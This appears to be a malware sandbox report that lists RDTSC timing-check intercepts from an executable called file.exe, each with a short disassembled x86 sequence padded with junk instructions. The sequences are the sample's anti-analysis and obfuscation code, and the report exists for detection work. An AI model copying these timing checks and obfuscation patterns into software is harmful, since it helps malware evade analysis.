Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793321 second address: 793325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793325 second address: 793329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794A29 second address: 794A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F66E8C719E0h 0x00000010 nop 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F66E8C719D8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+12450AE6h], edi 0x00000034 push 00000000h 0x00000036 xchg eax, esi 0x00000037 jmp 00007F66E8C719DCh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F66E8C719E2h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794A9D second address: 794AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F66E8838CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795A99 second address: 795B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F66E8C719E9h 0x0000000f jl 00007F66E8C719D6h 0x00000015 popad 0x00000016 pop edx 0x00000017 nop 0x00000018 jmp 00007F66E8C719E6h 0x0000001d push 00000000h 0x0000001f pushad 0x00000020 mov dword ptr [ebp+122D1BA8h], esi 0x00000026 pushad 0x00000027 stc 0x00000028 mov cx, FB1Ah 0x0000002c popad 0x0000002d popad 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F66E8C719D8h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D1CCAh] 0x00000050 mov dword ptr [ebp+122D1BA2h], edx 0x00000056 xchg eax, esi 0x00000057 jo 00007F66E8C719DAh 0x0000005d push edi 0x0000005e pushad 0x0000005f popad 0x00000060 pop edi 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796AC0 second address: 796AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 jl 00007F66E8838CF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795C55 second address: 795C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796AD3 second address: 796AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795C5B second address: 795C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F66E8C719E5h 0x0000000f jmp 00007F66E8C719DFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795C79 second address: 795D1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F66E8838CE6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f pushad 0x00000010 mov dword ptr [ebp+122D3684h], edi 0x00000016 popad 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F66E8838CE8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 add dword ptr [ebp+122D2AFAh], ebx 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov edi, dword ptr [ebp+122D27B1h] 0x0000004b mov bx, 80C1h 0x0000004f mov eax, dword ptr [ebp+122D09B1h] 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007F66E8838CE8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000019h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f jc 00007F66E8838CECh 0x00000075 add dword ptr [ebp+122D22B5h], edx 0x0000007b push FFFFFFFFh 0x0000007d xor bx, EE5Ah 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 jbe 00007F66E8838CF5h 0x0000008b jmp 00007F66E8838CEFh 0x00000090 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796BFA second address: 796BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7978DA second address: 79793F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F66E8838CE6h 0x00000009 jno 00007F66E8838CE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 je 00007F66E8838CE9h 0x0000001b movzx edi, bx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F66E8838CE8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a jmp 00007F66E8838CEFh 0x0000003f push 00000000h 0x00000041 jp 00007F66E8838CF1h 0x00000047 push eax 0x00000048 push ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79793F second address: 797943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796C9E second address: 796CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797AF9 second address: 797B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F66E8C719D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797B04 second address: 797B16 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66E8838CE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798AA1 second address: 798AA6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A994 second address: 79AA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F66E8838CE6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f pushad 0x00000010 mov si, 5056h 0x00000014 mov esi, 1023C876h 0x00000019 popad 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F66E8838CE8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 call 00007F66E8838CF8h 0x0000003b sub dword ptr [ebp+122D369Bh], edx 0x00000041 pop edi 0x00000042 push 00000000h 0x00000044 mov ebx, dword ptr [ebp+122D28C5h] 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c jns 00007F66E8838CECh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79AA05 second address: 79AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E7h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F66E8C719E8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79AA3D second address: 79AA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799A87 second address: 799AFD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66E8C719D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F66E8C719D8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov di, 4FF8h 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 xor ebx, 45ED9747h 0x0000003e mov eax, dword ptr [ebp+122D0FA1h] 0x00000044 mov dword ptr [ebp+122D2E01h], eax 0x0000004a push FFFFFFFFh 0x0000004c sub ebx, 44F1633Eh 0x00000052 nop 0x00000053 pushad 0x00000054 jmp 00007F66E8C719E9h 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799AFD second address: 799B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79AA41 second address: 79AA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F66E8C719DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BA6B second address: 79BA79 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BA79 second address: 79BA83 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66E8C719D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D88E3 second address: 7D8904 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F66E8838CE6h 0x00000008 jmp 00007F66E8838CF7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8A66 second address: 7D8A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F66E8C719D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8BB6 second address: 7D8BDA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66E8838CFDh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F66E8838CF5h 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD9D1 second address: 7DD9D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F334 second address: 74F33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DCDF1 second address: 7DCDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD513 second address: 7DD53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F66E8838CF8h 0x0000000e ja 00007F66E8838CE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD53A second address: 7DD53E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E13F4 second address: 7E13F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0E24 second address: 7E0E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0E28 second address: 7E0E32 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F66E8838CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E51B5 second address: 7E51CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E1h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E51CB second address: 7E51D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5308 second address: 7E531E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66E8C719D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F66E8C719DCh 0x00000010 jns 00007F66E8C719D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E531E second address: 7E5337 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F66E8838CE8h 0x00000008 pushad 0x00000009 jnl 00007F66E8838CE6h 0x0000000f jne 00007F66E8838CE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5337 second address: 7E533D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E543A second address: 7E5453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F66E8838CEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5453 second address: 7E5457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5457 second address: 7E545D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788EC6 second address: 788ECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788ECA second address: 788EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jbe 00007F66E8838CF0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788FD7 second address: 788FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788FDB second address: 788FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788FE1 second address: 788FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788FE7 second address: 788FFB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F66E8838CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788FFB second address: 789000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE2ED second address: 7EE2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE2F3 second address: 7EE30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F66E8C719E4h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC1D9 second address: 7EC1F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E8838CF3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC1F2 second address: 7EC1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC7FE second address: 7EC823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F66E8838CFBh 0x0000000b jmp 00007F66E8838CEBh 0x00000010 jmp 00007F66E8838CEAh 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC823 second address: 7EC82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECAB9 second address: 7ECAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F66E8838CF9h 0x0000000d jno 00007F66E8838CEEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECDF3 second address: 7ECDFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECDFC second address: 7ECE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED0A0 second address: 7ED0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED740 second address: 7ED74A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED74A second address: 7ED750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDCEA second address: 7EDD16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F66E8838CF1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F66E8838CF2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDD16 second address: 7EDD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F66E8C719DFh 0x0000000f jmp 00007F66E8C719DAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2735 second address: 7F2755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007F66E8838CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F66E8838CF4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2755 second address: 7F2763 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F66E8C719D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2763 second address: 7F2769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F559E second address: 7F55A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F55A6 second address: 7F55B0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F66E8838CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F57FB second address: 7F57FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5C4B second address: 7F5C6D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F66E8838CE6h 0x00000008 jmp 00007F66E8838CF8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5EFA second address: 7F5F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F66E8C719E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 je 00007F66E8C719D6h 0x00000017 jmp 00007F66E8C719E7h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5F3C second address: 7F5F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5F42 second address: 7F5F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC165 second address: 7FC17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F66E8838CE6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F66E8838CE6h 0x00000013 jnc 00007F66E8838CE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC17E second address: 7FC18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC18C second address: 7FC192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC192 second address: 7FC1A1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66E8C719DAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC1A1 second address: 7FC1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8838CF0h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jno 00007F66E8838CE6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC1C6 second address: 7FC1CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC309 second address: 7FC318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jbe 00007F66E8838CE6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC318 second address: 7FC31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC31E second address: 7FC349 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66E8838CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F66E8838CEAh 0x00000011 jmp 00007F66E8838CF5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC349 second address: 7FC34D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
